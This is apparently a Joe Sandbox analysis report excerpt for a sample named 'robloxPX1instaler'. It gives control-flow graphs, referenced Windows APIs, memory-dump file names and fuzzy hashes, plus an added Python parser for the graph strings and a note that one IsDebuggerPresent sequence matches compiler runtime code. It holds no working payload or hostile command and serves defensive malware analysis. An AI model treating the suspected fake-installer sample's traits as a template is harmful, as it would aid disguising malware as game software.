• Instruction Fuzzy Hash: 40E08C32240314BBDF213BA4EC0DB893B68EB41796F084021FA0CC6160DEB489819BB0

Control-flow Graph

control_flow_graph 62 d3caca-d3caf2 63 d3caf4-d3caf6 62->63 64 d3caf8-d3cafa 62->64 65 d3cb49-d3cb4c 63->65 66 d3cb00-d3cb07 call d3c9ff 64->66 67 d3cafc-d3cafe 64->67 69 d3cb0c-d3cb10 66->69 67->65 70 d3cb12-d3cb20 GetProcAddress 69->70 71 d3cb2f-d3cb46 69->71 70->71 73 d3cb22-d3cb2d call d3381c 70->73 72 d3cb48 71->72 72->65 73->72
Memory Dump Source
• Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8111f57d93fe4cee61e107a5636e9bfc093e822eac657fa522e79b6a5b5982ee
• Instruction ID: b91ca63975eabc139ea1accc5e61a32e8dc83a5dc79220634e66556490e785fd
• Opcode Fuzzy Hash: 8111f57d93fe4cee61e107a5636e9bfc093e822eac657fa522e79b6a5b5982ee
• Instruction Fuzzy Hash: 9E01D4337242255FDB168F6DEC46A5A73EAEB85360B285130F910EB198DF30D811E7B0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                   • Basic blocks (id: address range, internal calls / APIs referenced)
                                                                                     76: d3a4ea-d3a4f6 (entry, no incoming edge)
                                                                                     77: d3a528-d3a533, call d1e672
                                                                                     78: d3a4f8-d3a4fa
                                                                                     79: d3a513-d3a524, RtlAllocateHeap
                                                                                     80: d3a4fc-d3a4fd
                                                                                     82: d3a526
                                                                                     83: d3a4ff-d3a506, call d39cb0
                                                                                     86: d3a535-d3a537
                                                                                     88: d3a508-d3a511, call d425ed
                                                                                   • Edges: 76->77, 76->78, 77->86, 78->79, 78->80, 79->82, 79->83, 80->79, 82->86, 83->77, 83->88, 88->77, 88->79
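The control-flow graph of this function survives on the page only as Joe Sandbox's serialised `control_flow_graph` string (reproduced verbatim below as `CFG_LINE`). The following parser is an added example and not part of the Joe Sandbox report or its tooling: it turns that string into basic blocks and edges, recovers the entry block (the one no edge targets), and maps each referenced API to the block that calls it. The token grammar it assumes (decimal block id, hex address or address range, optional `call <target>` or an imported API name, `A->B` edge tokens) is inferred from this single line and is an assumption, not documented format.

```python
import re
from dataclasses import dataclass, field

# Serialised graph exactly as printed on this report page for the
# RtlAllocateHeap wrapper at d3a4ea (taken from the page, not constructed).
CFG_LINE = (
    "control_flow_graph 76 d3a4ea-d3a4f6 77 d3a528-d3a533 call d1e672 76->77 "
    "78 d3a4f8-d3a4fa 76->78 86 d3a535-d3a537 77->86 79 d3a513-d3a524 RtlAllocateHeap "
    "78->79 80 d3a4fc-d3a4fd 78->80 82 d3a526 79->82 83 d3a4ff-d3a506 call d39cb0 "
    "79->83 80->79 82->86 83->77 88 d3a508-d3a511 call d425ed 83->88 88->77 88->79"
)

# Assumed token shapes: "d3a526" or "d3a4ea-d3a4f6" (lowercase hex, no 0x prefix).
RANGE_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    nid: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal call targets (hex strings)
    apis: list = field(default_factory=list)   # imported API names referenced


def parse_cfg(line):
    """Parse one serialised control_flow_graph line into ({id: Block}, [(src, dst)])."""
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks, edges, current = {}, [], None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                       # edge token "A->B"
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":                   # "call <hex target>" belongs to current block
            if current is None or i + 1 >= len(tokens):
                raise ValueError("dangling call at token %d" % i)
            current.calls.append(tokens[i + 1])
            i += 2
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")   # new block: "<id> <range>"
            current = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[current.nid] = current
            i += 2
        else:                                 # anything else is an API annotation
            if current is None:
                raise ValueError("annotation before any block: %r" % tok)
            current.apis.append(tok)
            i += 1
    # A truncated extraction shows up as an edge to a block that was never defined.
    for s, d in edges:
        if s not in blocks or d not in blocks:
            raise ValueError("edge %d->%d references unknown block" % (s, d))
    return blocks, edges


def successors(edges):
    succ = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    return succ


def entry_block(blocks, edges):
    """The single block with no incoming edge is the function entry."""
    targets = {d for _, d in edges}
    roots = [b for b in blocks if b not in targets]
    if len(roots) != 1:
        raise ValueError("expected exactly one entry block, got %r" % roots)
    return blocks[roots[0]]


def api_blocks(blocks):
    """Map each referenced API name to the start addresses of blocks that use it."""
    out = {}
    for b in blocks.values():
        for api in b.apis:
            out.setdefault(api, []).append(hex(b.start))
    return out


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_LINE)
    print("entry:", hex(entry_block(blocks, edges).start))
    print("apis:", api_blocks(blocks))
    print("calls:", {hex(b.start): b.calls for b in blocks.values() if b.calls})
```

Run over a whole report, `api_blocks` gives a per-function list of which imports each disassembled routine touches, which is the cheapest way to separate one-off API users (e.g. a single RtlAllocateHeap wrapper like this one) from the functions that actually chain interesting calls.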
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00D2463C,00D3A27F,?,00D33C3D,00E4C588,00000018,00000003), ref: 00D3A51C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                   • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 5a6c8263b3ebfe0132dffcc4b8788cc38ac859c2aff1bd8ab692ff3f352bb457
                                                                                  • Instruction ID: 117523acdb5cc36e92d6e7ca7e2563a7266ee19d576d6693a6c6f06c0e8c7aa9
                                                                                  • Opcode Fuzzy Hash: 5a6c8263b3ebfe0132dffcc4b8788cc38ac859c2aff1bd8ab692ff3f352bb457
                                                                                  • Instruction Fuzzy Hash: 34E06D313412216BEA3127A99C15B6A7B8CDF527F1F190120EDD496190DFA0CD4186B3

                                                                                  Control-flow Graph

                                                                                   APIs
                                                                                   • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D1E470
                                                                                   • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D1E47A
                                                                                   • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D1E487
                                                                                   • Note: IsDebuggerPresent immediately followed by SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter(...) is the call sequence of the MSVC CRT's __raise_securityfailure (the /GS stack-cookie failure path, which then terminates the process). The "IsDebuggerPresent" signature in this report is therefore consistent with statically linked compiler runtime code rather than bespoke anti-debugging; confirm against the decompiled body before counting it as an evasion indicator.
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                   • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 74855b912a28cd28f1758e2823f710844644456d845fe0faeab03778b7928d7f
                                                                                  • Instruction ID: 1277b12689c86fddcd479f5224293937025c5d81ca64abef87c22773261288dd
                                                                                  • Opcode Fuzzy Hash: 74855b912a28cd28f1758e2823f710844644456d845fe0faeab03778b7928d7f
                                                                                  • Instruction Fuzzy Hash: 3731B574901228ABCB21DF65E889BCDBBB4FF18310F5041DAE41CA7251EB749BC58F65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                   • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                  • Instruction ID: 4b497eade63c6b0e2d40a8b430b350abfdc2fb51804a8f5684fc712f08e720d5
                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                  • Instruction Fuzzy Hash: BBE0EC72915278EBCB25DB9CD94598AF3EDEB45F50F5544A6B901E3151C270DE00CBE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                   • Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd

                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16387
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1638F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16418
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D16443
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D16498
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm

                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1600CF06,?,?,00000000,00D5D7FB,000000FF,?,00D343A1,00000002,?,00D34375,00D2466F), ref: 00D34403
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D34415
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D5D7FB,000000FF,?,00D343A1,00000002,?,00D34375,00D2466F), ref: 00D34437
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
Similarity
• API ID:
• String ID: @2
• API String ID: 0-2965403045
• Opcode ID: fc7f66a67da32abad67b56ad4d06c665252c48428ffbe5dda496a44f587a86b4
• Instruction ID: 587bba8a4e7d40d8850612008250fe9c37a3e6f36c76e19c900ad43ae35a905f
